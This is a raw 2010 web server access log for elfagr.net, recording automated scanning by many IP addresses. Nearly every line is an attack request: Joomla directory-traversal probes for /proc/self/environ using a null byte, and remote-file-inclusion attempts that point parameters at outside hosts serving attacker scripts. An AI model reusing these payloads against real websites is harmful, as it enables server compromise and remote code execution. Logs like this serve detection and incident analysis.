89.111.176.231 - - [17/Jun/2010:13:57:12 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:57:35 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:57:36 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
81.80.122.44 - - [17/Jun/2010:13:58:19 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.80.122.44 - - [17/Jun/2010:13:58:09 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.80.122.44 - - [17/Jun/2010:13:58:19 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.80.122.44 - - [17/Jun/2010:13:58:20 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.80.122.44 - - [17/Jun/2010:13:58:26 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:58:34 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:58:34 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:58:35 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "elfagr.net"
81.80.122.44 - - [17/Jun/2010:13:58:44 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:58:52 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:58:52 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:59:09 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:59:09 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:59:10 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:59:31 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:59:31 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:59:41 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:59:55 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:00:01 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:00:01 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:00:01 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:00:04 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:00:14 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:00:14 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "elfagr.net"
213.189.224.16 - - [17/Jun/2010:14:00:27 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:02:47 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:02:48 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:02:49 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
67.195.111.171 - - [17/Jun/2010:14:04:53 -0700] "GET /index_files/ HTTP/1.0" 200 7672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
213.133.114.100 - - [17/Jun/2010:14:06:00 -0700] "GET /logs/access.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
213.133.114.100 - - [17/Jun/2010:14:06:01 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
213.133.114.100 - - [17/Jun/2010:14:06:01 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:07:17 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:07:18 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:07:18 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
213.189.224.16 - - [17/Jun/2010:14:07:32 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
213.189.224.16 - - [17/Jun/2010:14:07:23 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
213.189.224.16 - - [17/Jun/2010:14:07:33 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:07:38 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:07:31 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:07:31 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:08:06 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:07:56 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:08:06 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:08:09 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:07:59 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:08:09 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:08:00 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:08:00 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
206.123.118.132 - - [17/Jun/2010:14:08:10 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
213.189.224.16 - - [17/Jun/2010:14:08:11 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
213.189.224.16 - - [17/Jun/2010:14:08:11 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
213.189.224.16 - - [17/Jun/2010:14:08:21 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:09:43 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:09:33 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:10:04 -0700] "GET /logs/access_091126.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:10:04 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:09:54 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:10:11 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:10:20 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:10:20 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:10:21 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:10:49 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:11:00 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:10:50 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:11:52 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:11:52 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:11:52 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
82.96.90.170 - - [17/Jun/2010:14:11:46 -0700] "GET /logs/access_100408.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
82.96.90.170 - - [17/Jun/2010:14:11:46 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
82.96.90.170 - - [17/Jun/2010:14:11:56 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.120.246.20 - - [17/Jun/2010:14:12:50 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:14:13:08 -0700] "GET /logs/access_100408.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:14:13:08 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:14:13:09 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:15:56 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:15:57 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:16:07 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:15:58 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:16:33 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:20:24 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:20:14 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:20:24 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:14:20:56 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
205.234.101.201 - - [17/Jun/2010:14:21:17 -0700] "GET /logs/access.log%20%20///?_zb_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.101.201 - - [17/Jun/2010:14:21:17 -0700] "GET //?_zb_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
205.234.101.201 - - [17/Jun/2010:14:21:26 -0700] "GET /logs///?_zb_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 5949 "-" "Mozilla/5.0" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:21:20 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:21:30 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:14:21:20 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:14:21:25 -0700] "GET /logs/access_100408.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:14:21:25 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:14:21:25 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
205.234.101.201 - - [17/Jun/2010:14:23:08 -0700] "GET //?_zb_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
205.234.101.201 - - [17/Jun/2010:14:23:08 -0700] "GET /logs/access.log%20%20///?_zb_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.101.201 - - [17/Jun/2010:14:23:18 -0700] "GET /logs///?_zb_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 5949 "-" "Mozilla/5.0" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:23:21 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:23:31 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:14:23:21 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "elfagr.net"
121.254.172.27 - - [17/Jun/2010:14:23:22 -0700] "GET //skin/board/moviefl//download.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.254.172.27 - - [17/Jun/2010:14:23:22 -0700] "GET /logs///skin/board/moviefl//download.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
